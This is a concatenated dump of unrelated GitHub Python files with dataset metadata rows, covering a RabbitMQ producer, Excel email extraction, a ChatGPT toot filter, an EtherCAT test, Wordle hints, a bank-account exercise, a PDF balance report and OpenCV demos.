                switch_loads[chosen_pos].append(installed_query)
    # print results
    print("####### Control Plane Placement Results #######")
    for index, loads in enumerate(switch_loads):
        if len(loads) > 0:
            print("Switch %d got %d tasks" % (index, len(loads)))
            '''
            for load in loads:
                if isinstance(load, installed_query_info):
                    print("Switch %d install query no.%d, from host %d to host %d" %
                          (index, load.query_id, load.src_id, load.dst_id))
            '''
| In-Net/NQATP | stimulator/easy_seeker.py | easy_seeker.py | py | 3,891 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "logging.basicConfig",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "logging.INFO",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "json.lo... |
20528044643 | import pika
connection = pika.BlockingConnection( #建立连接
pika.ConnectionParameters(host='localhost')
)
channel = connection.channel() #声明一个管道
#声明QUEUE
channel.queue_declare(queue='hello2',durable=True)
channel.basic_publish(exchange='',
routing_key='hello2',
body='Hello World!',
properties=pika.BasicProperties(delivery_mode=2,
)
)
#routing_key queue名字
#body 消息
print(" [x] Sent 'Hello World!3'")
connection.close() #关闭连接 | chenyaqiao0505/Code111 | RabbitMQ/producter.py | producter.py | py | 572 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pika.BlockingConnection",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "pika.ConnectionParameters",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "pika.BasicProperties",
"line_number": 15,
"usage_type": "call"
}
] |
25952738898 | #encoding utf-8
from openpyxl import load_workbook
from openpyxl import Workbook
from openpyxl.worksheet.table import Table, TableStyleInfo
import os
import re
def salvar_email():
    """Scan column A of the workbook's active sheet for SMTP address rows,
    drop unwanted addresses, strip the surrounding angle brackets and write
    the survivors into column B of the 'result' sheet."""
    path = 'E:/4 - ARQUIVO\PROJETOS\motor\email.xlsx'
    arquivo_excel = load_workbook(path)
    separados = arquivo_excel.active # read the currently active worksheet
    '''
    # obter sheets
    sheets = arquivo_excel.sheetnames
    planilha1 = arquivo_excel[sheets[n]]
    '''
    # iterate row by row
    max_linha = separados.max_row
    max_coluna = separados.max_column
    contador = 1
    for i in range(1, max_linha):
        a1 = str(separados.cell(row=i, column=1, ).value)
        #print(type(str(a1.value)))
        #print(str(a1.value))
        # NOTE(review): the pattern '\\SMTP\\b' is \S + 'MTP' + \b (any
        # non-space char followed by MTP); '\\bSMTP\\b' was likely intended.
        if re.search('\\SMTP\\b', a1, re.IGNORECASE):
            email = a1.split(',')
            for g in range(len(email)):
                if re.search('ricardo.campos', email[g], re.IGNORECASE):
                    email[g] = "0"
                if re.search('postmaster', email[g], re.IGNORECASE):
                    email[g] = "0"
                if re.search('@', email[g], re.IGNORECASE):
                    # strip the trailing and leading bracket characters
                    email[g] = email[g][:-1]
                    email[g] = email[g][1:]
                    # write into the 'result' sheet (this does not change the active sheet)
                    result = arquivo_excel['result']
                    result.cell(row=contador, column=2).value = email[g]
                    contador = contador + 1
                    print(email[g])
    arquivo_excel .save(path)
    os.system("PAUSE")
def retira():
    """Copy column B of the third sheet into column D of the second sheet,
    dropping the first five characters of each value."""
    path = 'E:/4 - ARQUIVO\PROJETOS\motor\email.xlsx'
    arquivo_excel = load_workbook(path)
    # fetch the sheet names
    sheets = arquivo_excel.sheetnames
    print(sheets)
    sheet1 = arquivo_excel[sheets[0]]
    sheet2 = arquivo_excel[sheets[1]]
    sheet3 = arquivo_excel[sheets[2]]
    # iterate row by row
    max_linha = sheet3.max_row
    max_coluna = sheet3.max_column
    contador = 1
    for i in range(1, max_linha):
        a1 = str(sheet3.cell(row=i, column=2, ).value)
        #a1 = a1.split(' ')
        # keep everything after the first five characters
        print(a1[5:])
        sheet2.cell(row=contador, column=4).value = a1[5:]
        contador = contador + 1
    arquivo_excel.save(path)
    os.system("PAUSE")
# Entry point: only the trimming pass runs; the SMTP extraction is disabled.
#salvar_email()
retira()
| ricardocvel/buscarEmail_excel- | inteirarExcel.py | inteirarExcel.py | py | 2,400 | python | pt | code | 0 | github-code | 36 | [
{
"api_name": "openpyxl.load_workbook",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "re.IGNORECASE",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "re.search",
"... |
10022682639 | import os
import re
import openai
from dotenv import load_dotenv
load_dotenv()
openai.api_key = os.environ['OPENAI_API_KEY']
def request_chatgpt(messages: list):
    """Send *messages* to the gpt-3.5-turbo chat-completion endpoint and
    return the raw API response."""
    payload = {"model": "gpt-3.5-turbo", "messages": messages}
    return openai.ChatCompletion.create(**payload)
def analyze_toots(mastodon_timelines: list) -> tuple[list[int], str]:
    """Ask ChatGPT which toots are about programming.

    Builds one "id=<id> - <text>" line per toot (HTML tags stripped), sends
    the batch with instructions to reply with a comma-separated id list,
    then parses the ids back out of the free-form reply.

    :param mastodon_timelines: toot objects exposing ``id`` and ``content``.
    :return: (list of selected toot ids, raw model reply text)
    """
    tag_pattern = re.compile('<.*?>')  # hoisted: compile once, not per toot
    message_content = ''.join(
        f"id={toot.id} - {tag_pattern.sub('', toot.content)}\n"
        for toot in mastodon_timelines
    )
    response = request_chatgpt(
        messages=[
            {"role": "user", "content": message_content},
            {
                "role": "system",
                "content": """
                You are a professional analyst.
                Please output `id list of statements about programming` based on the following constraints and input statements.
                # Constraints
                - Output no more than 20 IDs.
                - Use this format for output : `{id}, {id}, {id}, {id}, {id}`
                I'll send you the input data.
                """,
            },
        ]
    )["choices"][0]["message"]["content"]
    # Keep only comma-separated fragments containing digits; strip non-digits.
    relevant_toot_ids = [int(re.sub(r"\D", "", id)) for id in response.split(',') if re.search(r"\d", id)]
    return relevant_toot_ids, response
| mio256/mastardon | page/chatgpt_func.py | chatgpt_func.py | py | 1,302 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "dotenv.load_dotenv",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "openai.api_key",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "openai.ChatComple... |
26896963958 | #!/usr/bin/env python3
import sys
import time
import socket
import yaml
from dataclasses import asdict
import ipywidgets.widgets as widgets
from IPython.display import display
print(sys.executable)
from ecat_repl import ZmsgIO
from ecat_repl import FoeMaster
from ecat_repl import CtrlCmd
from ecat_repl import SdoCmd
from ecat_repl import SdoInfo
from ecat_repl import (
master_cmd_stop,
master_cmd_start,
master_cmd_get_slave_descr,
#
flash_cmd_load_default,
flash_cmd_save_flash,
flash_cmd_load_flash,
#
ctrl_cmd_start,
ctrl_cmd_stop,
ctrl_cmd_fan,
ctrl_cmd_led,
ctrl_cmd_run_torque_calib,
ctrl_cmd_set_home,
ctrl_cmd_set_zero,
ctrl_cmd_set_min_pos,
ctrl_cmd_set_max_pos,
ctrl_cmd_set_position,
ctrl_cmd_set_velocity,
ctrl_cmd_set_torque,
ctrl_cmd_set_current,
ctrl_cmd_dac_tune,
ctrl_cmd_get_adc,
ctrl_cmd_set_dac,
ctrl_cmd_test_done,
ctrl_cmd_test_error,
)
# Connect to the EtherCAT REPL daemon over ZeroMQ.
uri = "localhost:5555"
io = ZmsgIO(uri)
io.debug = False
scan_ids = []
# Restart the master in config mode, using EtherCAT position as board id.
io.doit(master_cmd_stop)
io.doit(master_cmd_start.set_args({'app_mode':'config_mode','use_ecat_pos_as_id':'true'}))
reply = io.doit(master_cmd_get_slave_descr)
yaml_msg = yaml.safe_load(reply['msg'])
scan_ids = yaml_msg.keys()
ids=list(scan_ids)
print(ids)
# Query SDO names and object descriptors from the first detected slave.
reply = io.doit(SdoInfo(u'SDO_NAME').set_bid(ids[0]))
yaml_msg = yaml.safe_load(reply['msg'])
sdo_names = yaml_msg
print(sdo_names)
reply = io.doit(SdoInfo(u'SDO_OBJD').set_bid(ids[0]))
yaml_msg = yaml.safe_load(reply['msg'])
sdo_infos = yaml_msg
print(sdo_infos)
# Poll all SDO values 100 times at roughly 10 Hz.
for i in range(100):
    reply = io.doit(SdoCmd(rd_sdo=sdo_names,wr_sdo={}).set_bid(ids[0]))
    yaml_msg = yaml.safe_load(reply['msg'])
    print(yaml_msg)
    time.sleep(0.1)
#io.doit(SdoCmd(rd_sdo=['fw_ver'],wr_sdo={'board_id': 101}).set_bid(ids[0]))
#io.doit(flash_cmd_save_flash.set_bid(ids[0])) | alessiomargan/Ecat-repl | ecat_repl/test/ecat_advr.py | ecat_advr.py | py | 1,873 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.executable",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "ecat_repl.ZmsgIO",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "ecat_repl.master_cmd_stop",
"line_number": 53,
"usage_type": "argument"
},
{
"api_name": "ec... |
2286638164 | from collections import Counter
def get_hints(word: str, secret_word: str):
    """Score a Wordle-style guess against the secret word.

    Returns one colour per letter of *word*:
      - "green": right letter in the right position,
      - "yellow": letter occurs elsewhere in the secret (duplicates respected),
      - "black": letter not (or no longer) available in the secret.
    Greens consume the secret's letter budget first, so a duplicate guess
    letter only turns yellow while unmatched copies remain.

    NOTE(review): only *word* is lowercased; the secret is assumed to be
    lowercase already.
    """
    word = word.lower()
    hints = [""] * len(word)
    unmatched_indexes = []
    remaining = Counter(secret_word)
    # First pass: exact matches go green and consume their letter.
    for idx, letter in enumerate(word):
        if letter == secret_word[idx]:
            hints[idx] = "green"
            remaining[letter] -= 1
        else:
            unmatched_indexes.append(idx)
    # Second pass: misplaced letters turn yellow while budget remains.
    # (Counter returns 0 for absent keys, so a plain > 0 check suffices.)
    for idx in unmatched_indexes:
        letter = word[idx]
        if remaining[letter] > 0:
            hints[idx] = "yellow"
            remaining[letter] -= 1
        else:
            hints[idx] = "black"
    # Fixed: the original ended with `if word == secret_word: return result
    # else: return result` — both branches identical, so return directly.
    return hints
| pythonfoo/rest-wordle | rest_wordle/utils.py | utils.py | py | 712 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "collections.Counter",
"line_number": 9,
"usage_type": "call"
}
] |
7158973131 | import os
import shutil
from pathlib import Path
from os import system
from shutil import rmtree
import shutil
mi_ruta = Path(Path.home(), '\Programacion-Cursos-Desarrollador\Python\Python-proyecto1\Dia7\Banco')
class Persona:
    """Minimal person record: first name and surname."""

    def __init__(self, nombre, apellido):
        """Store the person's first name and surname."""
        self.nombre, self.apellido = nombre, apellido
class Cliente(Persona):
    """Bank customer whose balance persists in BalanceCuenta.txt and whose
    deposits/withdrawals are appended to RegistroTransacciones.txt."""
    def __init__(self, nombre, apellido, numero_cuenta, balance = 0):
        super().__init__(nombre, apellido) # inherited from class Persona
        self.numero_cuenta = numero_cuenta
        self.balance = balance
        # NOTE(review): the balance argument is immediately overwritten by the
        # value read from BalanceCuenta.txt below.
        ruta_balance = Path(mi_ruta, 'BalanceCuenta.txt')
        BalanceCuentaLeer = open(ruta_balance)
        contenidoBalanceCuentaLeer = BalanceCuentaLeer.read()
        # print("Prueba balance print: ", contenidoBalanceCuentaLeer)
        # print("Tipo de dato: ", type(contenidoBalanceCuentaLeer))
        balance_int = int(contenidoBalanceCuentaLeer)
        # print("Tipo de dato 2: ", type(contenidoBalanceCuentaLeer))
        self.balance = balance_int
        # print(type(self.balance))
        BalanceCuentaLeer.close()
    def __str__(self):
        # Human-readable account summary (Spanish labels kept verbatim).
        return f"Cliente: { self.nombre } { self.apellido }\nNumero de Cuenta: { self.numero_cuenta }\nBalance: ${ self.balance }"
    def depositar(self, monto_deposito):
        # Add the amount, append an INGRESO line to the log, persist balance.
        self.balance += monto_deposito
        ruta_depositar = Path(mi_ruta, 'RegistroTransacciones.txt')
        ruta_balance = Path(mi_ruta, 'BalanceCuenta.txt')
        archivoRegistroTransacciones = open(ruta_depositar, "a")
        archivoRegistroTransacciones.write(f"{ monto_deposito } - INGRESO\n")
        archivoRegistroTransacciones.close()
        # Path.write_text(ruta_depositar, str(monto_deposito))  # wrong here: it would not add the newline \n
        Path.write_text(ruta_balance, str(self.balance))
        print("Deposito Aceptado")
    def retirar(self, monto_retiro):
        # Withdraw only when funds suffice; log a RETIRO line and persist.
        if self.balance >= monto_retiro:
            self.balance -= monto_retiro
            ruta_depositar = Path(mi_ruta, 'RegistroTransacciones.txt')
            ruta_balance = Path(mi_ruta, 'BalanceCuenta.txt')
            archivoRegistroTransacciones = open(ruta_depositar, "a")
            archivoRegistroTransacciones.write(f"{monto_retiro} - RETIRO\n")
            archivoRegistroTransacciones.close()
            Path.write_text(ruta_balance, str(self.balance))
            print("Retiro Realizado")
        else:
            print("Fondos Insuficientes Para el Retiro")
def crear_cliente():
    """Prompt the user for name, surname and account number (Spanish
    prompts) and build the corresponding Cliente."""
    nombre_cl = input("Ingrese su Nombre: ")
    apellido_cl = input("Ingrese su Apellido: ")
    numero_cuenta = input("Ingrese Su Numero de Cuenta: ")
    cliente = Cliente(nombre_cl, apellido_cl, numero_cuenta) # class Cliente
    return cliente
def inicio():
    """Interactive teller session: create the client, then loop on
    deposit (D) / withdraw (R) until the user chooses exit (S)."""
    mi_cliente = crear_cliente()
    print(mi_cliente) # show the freshly loaded account summary
    opcion = 0
    while opcion != 'S': # 'S' = exit
        print('Elija: Depositar (D), Retirar (R), Salir (S)')
        opcion = input()
        if opcion == 'D':
            monto_dep = int(input("Monto a Depositar: $"))
            mi_cliente.depositar(monto_dep)
        elif opcion == 'R':
            monto_dep = int(input("Monto a Retirar: $"))
            mi_cliente.retirar(monto_dep)
    print(mi_cliente) # show how the account looks after those operations
    print("Gracias Por Su Visita - Hasta Luego")
inicio()
# proyecto: https://www.udemy.com/course/python-total/learn/lecture/28747292#questions
# convertir str a int: https://www.freecodecamp.org/news/python-convert-string-to-int-how-to-cast-a-string-in-python/#:~:text=To%20convert%2C%20or%20cast%2C%20a,int(%22str%22)%20.
# convertir int a str: https://es.stackoverflow.com/questions/364966/como-convertir-un-dato-int-a-string-en-python
| Alexa-Silvermoon/curso-python-proyectos-udemy-federico | Dia7/ProyectoDelDia7 - mejorada cuenta bancaria.py | ProyectoDelDia7 - mejorada cuenta bancaria.py | py | 3,868 | python | es | code | 0 | github-code | 36 | [
{
"api_name": "pathlib.Path",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pathlib.Path.home",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_nu... |
3829108374 | # coding: utf-8
# Front-end blink test, used as a liveness (anti-spoofing) check
from scipy.spatial import distance as dist
from imutils import face_utils
import time
import dlib
import cv2
def eye_aspect_ratio(eye):
    """Compute the eye aspect ratio (EAR) from six eye landmark points.

    The EAR is the mean of the two vertical lid distances divided by the
    horizontal eye width; it drops sharply when the eye closes.
    """
    vertical_a = dist.euclidean(eye[1], eye[5])
    vertical_b = dist.euclidean(eye[2], eye[4])
    horizontal = dist.euclidean(eye[0], eye[3])
    return (vertical_a + vertical_b) / (2.0 * horizontal)
def main():
    """Watch the webcam and return 1 as soon as a long-enough eye closure
    (blink) is detected; runs until 'q' is pressed otherwise."""
    shape_predictor = "shape_predictor_68_face_landmarks.dat"
    EYE_AR_THRESH = 0.27 # EAR below this value counts as a closed eye
    EYE_AR_CONSEC_FRAMES = 33 # the number of consecutive frames the eye must be below the threshold
    # initialize the frame counters and the total number of blinks
    COUNTER = 0
    TOTAL = 0
    # initialize dlib's face detector (HOG-based) and then create
    # the facial landmark predictor
    print("[INFO] loading facial landmark predictor...")
    detector = dlib.get_frontal_face_detector()
    predictor = dlib.shape_predictor(shape_predictor)
    # grab the indexes of the facial landmarks for the left and right eye, respectively
    (lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS["left_eye"]
    (rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS["right_eye"]
    # start the video stream thread
    print("[INFO] starting video stream thread...")
    print("[INFO] print q to quit...")
    vs = cv2.VideoCapture(1)
    time.sleep(1.0)
    # loop over frames from the video stream
    while True:
        # grab the frame from the threaded video file stream, resize it, and convert it to grayscale channels)
        _, frame = vs.read()
        frame = cv2.resize(frame, (0, 0), fx=0.75,fy=0.75)
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        # detect faces in the grayscale frame
        rects = detector(gray, 0)
        # loop over the face detections
        for rect in rects:
            # determine the facial landmarks for the face region, then
            # convert the facial landmark (x, y)-coordinates to a NumPy array
            shape = predictor(gray, rect)
            shape = face_utils.shape_to_np(shape)
            # extract the left and right eye coordinates, then use the
            # coordinates to compute the eye aspect ratio for both eyes
            leftEye = shape[lStart:lEnd]
            rightEye = shape[rStart:rEnd]
            leftEAR = eye_aspect_ratio(leftEye)
            rightEAR = eye_aspect_ratio(rightEye)
            # average the eye aspect ratio together for both eyes
            ear = (leftEAR + rightEAR) / 2.0
            # compute the convex hull for the left and right eye, then visualize each of the eyes
            leftEyeHull = cv2.convexHull(leftEye)
            rightEyeHull = cv2.convexHull(rightEye)
            cv2.drawContours(frame, [leftEyeHull], -1, (0, 255, 0), 1)
            cv2.drawContours(frame, [rightEyeHull], -1, (0, 255, 0), 1)
            # check to see if the eye aspect ratio is below the blink
            # threshold, and if so, increment the blink frame counter
            if ear < EYE_AR_THRESH:
                COUNTER += 1
            # otherwise, the eye aspect ratio is not below the blink threshold
            else:
                # eyes stayed closed long enough: report a detected blink
                if COUNTER >= EYE_AR_CONSEC_FRAMES:
                    return 1
                # reset the eye frame counter
                COUNTER = 0
            # draw the total number of blinks on the frame along with the computed eye aspect ratio for the frame
            cv2.putText(frame, "Blinks: {}".format(TOTAL), (10, 30),
                cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
            cv2.putText(frame, "EAR: {:.2f}".format(ear), (300, 30),
                cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
        cv2.imshow("Frame", frame)
        key = cv2.waitKey(1) & 0xFF
        # if the `q` key was pressed, break from the loop
        if key == ord("q"):
            break
    # do a bit of cleanup
    cv2.destroyAllWindows()

if __name__ == '__main__':
    main()
| HollowMan6/Lanck-Face-Recognition-Lock-Competition-Backend-Code | Development-Board/DetectBlinks.py | DetectBlinks.py | py | 4,286 | python | en | code | 22 | github-code | 36 | [
{
"api_name": "scipy.spatial.distance.euclidean",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "scipy.spatial.distance",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "scipy.spatial.distance.euclidean",
"line_number": 13,
"usage_type": "call"
},
... |
35658691918 | """The filtersets tests module."""
import pytest
from django.db.models.query import QuerySet
from django.http import HttpRequest
from communication.serializer_fields import (ParentMessageForeignKey,
UserReviewForeignKey)
from conftest import OBJECTS_TO_CREATE
pytestmark = pytest.mark.django_db
def test_user_review_foreign_key(reviews: QuerySet):
    """Should return the filtered list of reviews by a user."""
    obj = UserReviewForeignKey()
    request = HttpRequest()
    # The field scopes its queryset by request.user, so attach a fake request.
    user = reviews[0].professional.user
    request.user = user
    obj._context = {"request": request}  # pylint: disable=protected-access
    result = obj.get_queryset()
    # Of the two fixture reviews, only one targets this user's professional.
    assert reviews.count() == 2
    assert result.count() == 1
    assert result.first().professional.user == user
def test_parent_message_foreign_key(messages: QuerySet):
    """Should return the filtered list of messages by a user."""
    obj = ParentMessageForeignKey()
    request = HttpRequest()
    # The field must only offer messages addressed to the requesting user.
    user = messages[0].sender
    request.user = user
    obj._context = {"request": request}  # pylint: disable=protected-access
    result = obj.get_queryset()
    # Fixture creates OBJECTS_TO_CREATE * 4 messages in total; only those
    # received by this user should remain after filtering.
    assert messages.count() == OBJECTS_TO_CREATE * 4
    assert result.count() == OBJECTS_TO_CREATE
    assert result.first().recipient == user
| webmalc/d8base-backend | communication/tests/serializer_fields_tests.py | serializer_fields_tests.py | py | 1,305 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pytest.mark",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "django.db.models.query.QuerySet",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "communication.serializer_fields.UserReviewForeignKey",
"line_number": 15,
"usage_type": ... |
41165135533 | # -*- coding: utf-8 -*-
'''
This file is part of Habitam.
Habitam is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.
Habitam is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public
License along with Habitam. If not, see
<http://www.gnu.org/licenses/>.
Created on Jul 21, 2013
@author: Stefan Guna
'''
from habitam.downloads.common import habitam_brand, signatures, MARGIN
from reportlab.lib import colors
from reportlab.lib.pagesizes import A4, landscape
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.units import cm
from reportlab.platypus.doctemplate import SimpleDocTemplate
from reportlab.platypus.flowables import Spacer
from reportlab.platypus.paragraph import Paragraph
from reportlab.platypus.tables import Table, TableStyle
import logging
import tempfile
logger = logging.getLogger(__name__)
__HEIGHT__ = A4[0]
__WIDTH__ = A4[1]
def __assets(building, day):
    """Collect the asset-side balances of *building* as of *day* for the
    assets/liabilities report. Keys: 'cash', 'bank', 'apartment_pending',
    'penalties_pending', 'outstanding_invoices'."""
    result = {}
    # cash-box and bank balances (standard accounts only)
    for mt in ['cash', 'bank']:
        is_mt = lambda ac: ac.money_type == mt and ac.type == 'std'
        result[mt] = building.balance_by_type(is_mt, day)
    aps = building.apartments()
    ap_pending = 0
    penalties_pending = 0
    for ap in aps:
        ap_pending = ap_pending + ap.balance(day)
        tmp = ap.penalties(day)
        if tmp != None:
            # NOTE(review): penalties(day) is evaluated a second time here;
            # tmp could be reused instead.
            penalties_pending = penalties_pending + ap.penalties(day)
    # amounts still unpaid by owners on the current maintenance list
    result['apartment_pending'] = ap_pending * -1
    # residents' outstanding penalties at the time this report is produced
    result['penalties_pending'] = penalties_pending * -1
    # supplier/contractor invoices not yet distributed to maintenance lists;
    # everything is automatically distributed to the list
    result['outstanding_invoices'] = 0
    return result
def __liabilities(building, day):
    """Collect the liability-side balances (funds and 3rd-party invoices)
    of a building at the given day, keyed by account type."""
    # fond rulment / fond de reparatii / fond de penalizari /
    # fonduri speciale / facturi de la terti
    fund_types = ['rulment', 'repairs', 'penalties', 'special', '3rd party']
    return {t: building.balance_by_type(lambda ac, t=t: ac.type == t, day)
            for t in fund_types}
def __balance_format(canvas, doc):
    """Page-decoration callback for the balance PDF: draws the centred
    title and the Habitam branding on every page.

    ``doc.habitam_data`` is set by __to_pdf before build() runs.
    """
    canvas.saveState()
    canvas.setFontSize(16)
    t = u'Situația soldurilor elementelor de activ și pasiv pentru %s la %s'
    canvas.drawCentredString(__WIDTH__ / 2.0, __HEIGHT__ - 100,
                             t % (doc.habitam_data['building'].name, doc.habitam_data['day']))
    habitam_brand(canvas, __WIDTH__, __HEIGHT__)
    canvas.restoreState()
def __format_data(data):
    """Build the reportlab Table for the assets/liabilities statement.

    ``data`` must contain the 'assets' and 'liabilities' dicts produced by
    __assets / __liabilities. Each row pairs one asset line with one
    liability line; the last row holds the two totals.
    """
    styles = getSampleStyleSheet()
    assets = data['assets']
    liabilities = data['liabilities']
    # Columns: row number, asset label, asset value, liability label, liability value
    d = [['NR.\nCRT.', 'ELEMENTE DE ACTIV', 'VALORI\n(LEI)', 'ELEMENTE DE PASIV', 'VALORI\n(LEI)'],
         ['1.', Paragraph(u'Sold în casă', styles['Normal']), assets['cash'], Paragraph('Sold fond de rulment', styles['Normal']), liabilities['rulment']],
         ['2.', Paragraph(u'Sold conturi la bănci', styles['Normal']), assets['bank'], Paragraph(u'Sold fond de reparații', styles['Normal']), liabilities['repairs']],
         ['3.', Paragraph(u'Sume neachitate de proprietarii din asociație pentru lista de plată curentă', styles['Normal']), assets['apartment_pending'], Paragraph('Sold fond sume speciale', styles['Normal']), liabilities['special']],
         ['4.', Paragraph(u'Restanțe existente la data întocmirii acestei situații', styles['Normal']), assets['penalties_pending'], Paragraph('Soldul altor fonduri legal stabilite', styles['Normal']), '0'],
         ['5.', Paragraph(u'Debitori, alții decât mebrii asociației', styles['Normal']), '0', Paragraph('Furnizori pentru facturi neachitate', styles['Normal']), '0'],
         ['6.', Paragraph(u'Acte de plată pe luna în curs, nerepartizate proprietarilor', styles['Normal']), assets['outstanding_invoices'], Paragraph(u'Creditori diverși', styles['Normal']), liabilities['3rd party']],
         ['7.', Paragraph(u'Acte de plăți pentru cheltuielile aferente fondurilor de reparații, speciale, de penalizări care nu au fost încă scăzute din fondurile respective', styles['Normal']), '0', '', ''],
         ['', Paragraph(u'TOTAL PARTEA I', styles['Normal']), sum(assets.values()), Paragraph(u'TOTAL PARTEA II', styles['Normal']), sum(liabilities.values())]
         ]
    table = Table(d, colWidths=[1.3 * cm, 7 * cm, 4 * cm, 7 * cm, 4 * cm])
    # Bold centred header row, centred number/value columns, full grid.
    table.setStyle(TableStyle([
        ('FONT', (0, 0), (-1, 0), 'Helvetica-Bold'),
        ('ALIGN', (0, 0), (-1, 0), 'CENTER'),
        ('VALIGN', (0, 0), (-1, 0), 'MIDDLE'),
        ('ALIGN', (0, 0), (0, -1), 'CENTER'),
        ('VALIGN', (0, 0), (0, -1), 'MIDDLE'),
        ('ALIGN', (2, 0), (2, -1), 'CENTER'),
        ('VALIGN', (2, 0), (2, -1), 'MIDDLE'),
        ('ALIGN', (4, 0), (4, -1), 'CENTER'),
        ('VALIGN', (4, 0), (4, -1), 'MIDDLE'),
        ('INNERGRID', (0, 0), (-1, -1), 0.25, colors.black),
        ('BOX', (0, 0), (-1, -1), 0.25, colors.black)
    ]))
    return table
def __to_pdf(temp, data):
    """Render the balance statement to ``temp`` as a landscape-A4 PDF."""
    doc = SimpleDocTemplate(temp, pagesize=landscape(A4), leftMargin=MARGIN,
                            rightMargin=MARGIN, topMargin=MARGIN,
                            bottomMargin=MARGIN,
                            title=u'Situația activ/pasiv pentru %s' % data['building'].name,
                            author='www.habitam.ro')
    flowables = [Spacer(1, 6 * cm), __format_data(data), Spacer(1, cm), signatures()]
    # Stash the data on the doc so the page-format callback can read it.
    doc.habitam_data = data
    doc.build(flowables, onFirstPage=__balance_format, onLaterPages=__balance_format)
def download_balance(building, day):
    """Generate the assets/liabilities balance PDF for a building.

    Returns the open NamedTemporaryFile containing the rendered PDF;
    the caller is responsible for closing (and thereby deleting) it.
    """
    data = {'building': building, 'day': day,
            'assets': __assets(building, day),
            'liabilities': __liabilities(building, day)}
    # lazy %-formatting: only rendered when DEBUG logging is enabled
    logger.debug('Balance is %s', data)
    temp = tempfile.NamedTemporaryFile()
    __to_pdf(temp, data)
    return temp
| habitam/habitam-core | habitam/downloads/balance.py | balance.py | py | 6,509 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "reportlab.lib.pagesizes.A4",
"line_number": 38,
"usage_type": "name"
},
{
"api_name": "reportlab.lib.pagesizes.A4",
"line_number": 39,
"usage_type": "name"
},
{
"api_name"... |
import cv2
import numpy as np
from matplotlib import pyplot as plt
import os

os.chdir('C:\\Users\\sachi\\.vscode\\GitHubRepos\\OSCV_Exercises')
exetasknum = 1

# Contours can be explained simply as a curve joining all the continuous points
# (along the boundary) having the same color or intensity. Contours are a useful
# tool for shape analysis and object detection/recognition.
# - For better accuracy, use binary images: threshold or Canny before findContours.
# - In OpenCV, finding contours is like finding white objects on a black
#   background: the object should be white, the background black.
if exetasknum == 1:
    im = cv2.imread('test.jpg')
    imgray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
    ret, thresh = cv2.threshold(imgray, 127, 255, 0)
    # OpenCV 3.x returns (image, contours, hierarchy); 4.x returns
    # (contours, hierarchy). Dispatch on the installed major version instead of
    # calling findContours unconditionally with the 4.x unpacking (which would
    # crash on 3.x). Both branches now search the binary image `thresh`, not the
    # colour frame.
    major = cv2.__version__.split('.')[0]
    if major == '3':
        ret, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    else:
        contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    # Draw all contours (index -1) in green with thickness 3.
    img = cv2.drawContours(im, contours, -1, (0, 255, 0), 3)
    while True:
        cv2.imshow('img', img)
        k = cv2.waitKey(1) & 0xFF
        if k == 27:  # Esc quits the preview loop
            break
{
"api_name": "os.chdir",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "cv2.imread",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2GRAY",
"line_number... |
34162683454 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import tempfile
from subprocess import PIPE, Popen
import os
import random
import codecs
import math
from sklearn.pipeline import FeatureUnion
from sklearn.pipeline import Pipeline
from resources import SEMEVAL_SCORER_PATH
logger = logging.getLogger(__name__)
def pretty_pipeline(obj):
    """Pretty print a sklearn Pipeline.

    This function is especially useful to extract information within
    FeatureUnion Pipeline.

    Args:
        obj: A sklearn Pipeline, FeatureUnion, or any nested combination
            thereof (lists/tuples are recursed into).

    Returns:
        A flat version of the Pipeline object: dicts for FeatureUnion and
        Pipeline nodes, lists for sequences, everything else unchanged.
    """
    if isinstance(obj, list):
        # recurse element-wise
        return [pretty_pipeline(o) for o in obj]
    elif isinstance(obj, FeatureUnion):
